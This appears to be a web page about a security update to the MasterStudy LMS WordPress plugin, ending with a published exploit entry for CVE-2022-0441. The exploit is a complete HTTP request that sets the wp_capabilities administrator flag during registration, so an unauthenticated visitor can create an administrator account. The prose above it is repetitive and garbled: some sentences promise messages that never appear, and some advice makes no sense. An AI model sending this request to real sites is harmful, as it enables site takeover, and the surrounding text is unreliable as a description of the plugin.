This could potentially allow for users outside of the WordPress installation to view, edit, or delete posts or members. We have changed the validation code in these scenarios to avoid any issues. In order to invalidate an account, the following message needs to be shown:

When you try to register an account with an email address that is already registered, the plugin will now show the following message:

Impersonating an administrator is a serious security issue. You may want to consider deactivating this feature for the sake of the security of your installation.

If you want to use this feature again, please make sure to deactivate the plugin for a few days before reactivating it.

What’s next?

With the release of MasterStudy LMS WordPress version 2.7.7, we are also rolling out a new migration path for existing installations.

With the 2.7.7 release, we are also introducing a new migration path to move existing installations. If your WordPress installation is currently using version 2.6.x or lower, you can migrate to version 2.7.7 with a single click via our migration plugin.

We hope that by migrating your installation to version 2.7.7 you will have the best experience with our new WordPress plugin. If you have any questions or concerns, do not hesitate to reach out to our support team via the in-built support ticketing system.

Want to stay up

What is the MasterStudy LMS WordPress Plugin?

The MasterStudy LMS WordPress plugin is a powerful learning management system that allows you to create online courses, manage student progress, and track your success in an easy-to-use dashboard. This plugin utilizes the WordPress platform so that your courses can be accessed from any mobile device or browser.

Want to stay up?
This plugin is a powerful learning management system that allows you to create online courses, manage student progress, and track your success in an easy-to-use dashboard. This plugin utilizes the WordPress platform so that your courses can be accessed from any mobile device or browser.

What is Master Study LMS?

Master Study is an online learning management system, or LMS that allows you to create, manage and control your courses from a central location with a few clicks of the mouse.

Learn how to use MasterStudy for your WordPress website at https://www.masterstudyapp.com/wordpress-plugin

What’s new in MasterStudy LMS v2.7.7?

Version 2.7.7 focuses on maintaining a stable release for the coming year and locking down a lot of the configuration options to make your site more secure.

We’ve also changed the validation code in these scenarios to avoid any issues:
- If you try to register an account with an email address that is already registered, the plugin will now show the following message:
- When you try to register an account with another user’s email address, the plugin will now show the following message:

Exploit

# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
# Date: 16.02.2022
# Author: Numan Türle
# CVE: CVE-2022-0441
# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <2.7.6
# https://www.youtube.com/watch?v=SI_O6CHXMZk
# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed


POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339

{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}

Timeline

Published on: 03/07/2022 09:15:00 UTC
Last modified on: 03/11/2022 17:33:00 UTC

References